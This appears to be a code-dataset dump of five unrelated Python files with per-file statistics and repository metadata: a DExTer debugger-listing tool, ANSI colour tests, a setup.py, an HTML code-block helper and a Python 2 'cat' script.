# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
"""List debuggers tool."""
from dex.debugger.Debuggers import add_debugger_tool_arguments1
from dex.debugger.Debuggers import handle_debugger_tool_options1
from dex.debugger.Debuggers import Debuggers
from dex.tools import ToolBase
from dex.utils import Timer
from dex.utils.Exceptions import DebuggerException, Error
class Tool(ToolBase):
    """List all of the potential debuggers that DExTer knows about and whether
    there is currently a valid interface available for them.
    """

    @property
    def name(self):
        return 'DExTer list debuggers'

    def add_tool_arguments(self, parser, defaults):
        parser.description = Tool.__doc__
        add_debugger_tool_arguments1(parser, defaults)

    def handle_options(self, defaults):
        handle_debugger_tool_options1(self.context, defaults)

    def go(self):
        with Timer('list debuggers'):
            try:
                Debuggers(self.context).list()
            except DebuggerException as e:
                raise Error(e)
        return 0
| 40.089286 | 79 | 0.732294 | 304 | 2,245 | 5.345395 | 0.496711 | 0.054154 | 0.027692 | 0.044308 | 0.055385 | 0 | 0 | 0 | 0 | 0 | 0 | 0.005034 | 0.203563 | 2,245 | 55 | 80 | 40.818182 | 0.903803 | 0.588419 | 0 | 0 | 0 | 0 | 0.039638 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.181818 | false | 0 | 0.272727 | 0.045455 | 0.590909 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
24a9d193850ef9de315e00eae6af3dbda90f9774 | 2,025 | py | Python | tests/test_create_color.py | Nazime/coloring | 4e519a5b440bb4af628048ec9cef2b8698128db6 | [
"MIT"
] | 22 | 2020-07-28T19:45:32.000Z | 2022-03-09T04:48:51.000Z | tests/test_create_color.py | Nazime/coloring | 4e519a5b440bb4af628048ec9cef2b8698128db6 | [
"MIT"
] | null | null | null | tests/test_create_color.py | Nazime/coloring | 4e519a5b440bb4af628048ec9cef2b8698128db6 | [
"MIT"
] | 1 | 2021-11-12T19:23:59.000Z | 2021-11-12T19:23:59.000Z | import pytest
from coloring import create_color
from coloring.consts import *


def test_create_color():
    text = "Hello"
    mycolor = create_color(120, 160, 200)
    colored_text = mycolor(text)
    assert colored_text == f"{CSI}38;2;120;160;200m{text}{RESET_COLOR}"

    mycolor = create_color(128, 128, 128)
    colored_text = mycolor(text)
    assert colored_text == f"{CSI}38;2;128;128;128m{text}{RESET_COLOR}"


def test_create_color_bold():
    text = "Hello"
    mycolor = create_color(120, 160, 200, s="b")
    colored_text = mycolor(text)
    assert (
        colored_text
        == f"{CSI}38;2;120;160;200m{BOLD}{text}{RESET_BOLD_AND_DIM}{RESET_COLOR}"
    )


def test_create_color_underline():
    text = "Hello"
    mycolor = create_color(120, 160, 200, s="u")
    colored_text = mycolor(text)
    assert (
        colored_text
        == f"{CSI}38;2;120;160;200m{UNDERLINE}{text}{RESET_UNDERLINE}{RESET_COLOR}"
    )


def test_create_color_cross():
    text = "Hello"
    mycolor = create_color(120, 160, 200, s="c")
    colored_text = mycolor(text)
    assert (
        colored_text == f"{CSI}38;2;120;160;200m{CROSS}{text}{RESET_CROSS}{RESET_COLOR}"
    )


def test_create_color_style_only():
    text = "Hello"
    mycolor = create_color(s="b")
    colored_text = mycolor(text)
    assert colored_text == f"{BOLD}{text}{RESET_BOLD_AND_DIM}"


def test_create_color_background():
    # Red background
    text = "Hello"
    mycolor = create_color(bg=(120, 160, 200))
    colored_text = mycolor(text)
    assert colored_text == f"{CSI}48;2;120;160;200m{text}{RESET_BACKGROUND}"

    mycolor = create_color(bg=(128, 128, 128))
    colored_text = mycolor(text)
    assert colored_text == f"{CSI}48;2;128;128;128m{text}{RESET_BACKGROUND}"


def test_create_color_signature_error():
    with pytest.raises(TypeError):
        create_color(12, 12)
    with pytest.raises(TypeError):
        create_color(12, 12, "lol")
    with pytest.raises(TypeError):
        create_color(12)
| 25 | 88 | 0.665185 | 286 | 2,025 | 4.482517 | 0.164336 | 0.163027 | 0.112324 | 0.137285 | 0.776911 | 0.776911 | 0.606084 | 0.514041 | 0.430577 | 0.344774 | 0 | 0.096794 | 0.199012 | 2,025 | 80 | 89 | 25.3125 | 0.693588 | 0.014321 | 0 | 0.407407 | 0 | 0.055556 | 0.220773 | 0.202208 | 0 | 0 | 0 | 0 | 0.148148 | 1 | 0.12963 | false | 0 | 0.055556 | 0 | 0.185185 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
24aaa027a369814fc245e15cc638702d426aa217 | 429 | py | Python | setup.py | 3lLobo/embed | d77c2af78e88908afc5f81a1f681a9b3e4c5d6d6 | [
"MIT"
] | 1 | 2020-10-12T12:12:28.000Z | 2020-10-12T12:12:28.000Z | setup.py | 3lLobo/embed | d77c2af78e88908afc5f81a1f681a9b3e4c5d6d6 | [
"MIT"
] | null | null | null | setup.py | 3lLobo/embed | d77c2af78e88908afc5f81a1f681a9b3e4c5d6d6 | [
"MIT"
] | 1 | 2020-12-21T18:24:26.000Z | 2020-12-21T18:24:26.000Z | from setuptools import setup
setup(name='embed',
      version='0.1',
      description='Basic implementation of knowledge graph embedding.',
      url='https://github.com/pbloem/embed',
      author='Peter Bloem',
      author_email='embed@peterbloem.nl',
      license='MIT',
      packages=['embed'],
      install_requires=[
          'torch',
          'tensorboard',
          'tqdm'
      ],
zip_safe=False) | 26.8125 | 73 | 0.58042 | 43 | 429 | 5.72093 | 0.883721 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.006494 | 0.282051 | 429 | 16 | 74 | 26.8125 | 0.792208 | 0 | 0 | 0 | 0 | 0 | 0.346512 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.066667 | 0 | 0.066667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
24b074035a2ee27584cb43aeb963e311d3388a92 | 2,115 | py | Python | dryxPython/htmlframework/code.py | thespacedoctor/dryxPython | 8f34f997192eebef9403bd40e4b7c1b1d216f53c | [
"BSD-3-Clause"
] | 2 | 2015-08-01T16:00:44.000Z | 2017-02-24T21:06:50.000Z | dryxPython/htmlframework/code.py | thespacedoctor/dryxPython | 8f34f997192eebef9403bd40e4b7c1b1d216f53c | [
"BSD-3-Clause"
] | null | null | null | dryxPython/htmlframework/code.py | thespacedoctor/dryxPython | 8f34f997192eebef9403bd40e4b7c1b1d216f53c | [
"BSD-3-Clause"
] | null | null | null | #!/usr/local/bin/python
# encoding: utf-8
"""
*Code elements for TBS htmlframework*
:Author:
David Young
:Date Created:
April 16, 2013
:dryx syntax:
- ``xxx`` = come back here and do some more work
- ``_someObject`` = a 'private' object that should only be changed for debugging
:Notes:
- If you have any questions requiring this script please email me: davidrobertyoung@gmail.com
"""
###################################################################
# CLASSES #
###################################################################
###################################################################
# PUBLIC FUNCTIONS #
###################################################################
# LAST MODIFIED : April 16, 2013
# CREATED : April 16, 2013
# AUTHOR : DRYX
def code(
        content="",
        inline=True,
        scroll=False):
    """
    *Generate a code section*

    **Key Arguments:**
        - ``content`` -- the content of the code block
        - ``inline`` -- inline or block?
        - ``scroll`` -- give the block a scroll bar on y-axis?

    **Return:**
        - ``code`` -- the code section
    """
    ################ > IMPORTS ################
    ## STANDARD LIB ##
    ## THIRD PARTY ##
    ## LOCAL APPLICATION ##

    ################ >ACTION(S) ################
    if scroll:
        scroll = "pre-scrollable"
    else:
        scroll = ""

    if inline:
        code = """<code>%(content)s</code>""" % locals()
    else:
        code = """
<pre class="%(scroll)s"><code>%(content)s</code></pre>""" % locals()

    return code
###################################################################
# PRIVATE (HELPER) FUNCTIONS #
###################################################################
###################################################################
# TEMPLATE FUNCTIONS #
###################################################################
| 29.375 | 97 | 0.35461 | 153 | 2,115 | 4.895425 | 0.627451 | 0.028037 | 0.044059 | 0.048064 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.012298 | 0.269504 | 2,115 | 71 | 98 | 29.788732 | 0.472492 | 0.468558 | 0 | 0.142857 | 0 | 0 | 0.257985 | 0.179361 | 0 | 0 | 0 | 0 | 0 | 1 | 0.071429 | false | 0 | 0 | 0 | 0.142857 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
24b62e0fc473c84a416b454f895c5c95bb5b4121 | 713 | py | Python | bin/cat_main.py | minersoft/miner | 247ae1ffb27a4ce3203ac236afd2ed145b31a465 | [
"BSD-3-Clause"
] | 1 | 2015-04-18T16:48:48.000Z | 2015-04-18T16:48:48.000Z | bin/cat_main.py | minersoft/miner | 247ae1ffb27a4ce3203ac236afd2ed145b31a465 | [
"BSD-3-Clause"
] | null | null | null | bin/cat_main.py | minersoft/miner | 247ae1ffb27a4ce3203ac236afd2ed145b31a465 | [
"BSD-3-Clause"
] | null | null | null | #
# Copyright Michael Groys, 2014
#

import sys
from bin_utils import *

usage = "Usage: cat <file>..."

if len(sys.argv) <= 1:
    files = ["-"]
elif sys.argv[1] in ["-h", "--help"]:
    print usage
    sys.exit()
else:
    files = sys.argv[1:]

reopenFileInBinMode(sys.stdout)
openMode = "rb"

for fileName in expandFiles(files):
    if fileName == "-":
        fileObj = sys.stdin
        reopenFileInBinMode(fileObj)
    else:
        try:
            fileObj = open(fileName, openMode)
        except Exception as e:
            print >> sys.stderr, str(e)
            sys.exit(1)
    copyStream(fileObj, sys.stdout)
    if fileObj != sys.stdin:
        fileObj.close()
| 19.805556 | 47 | 0.54979 | 81 | 713 | 4.82716 | 0.530864 | 0.053708 | 0.061381 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.016427 | 0.316971 | 713 | 35 | 48 | 20.371429 | 0.786448 | 0.040673 | 0 | 0.08 | 0 | 0 | 0.051163 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.08 | null | null | 0.08 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |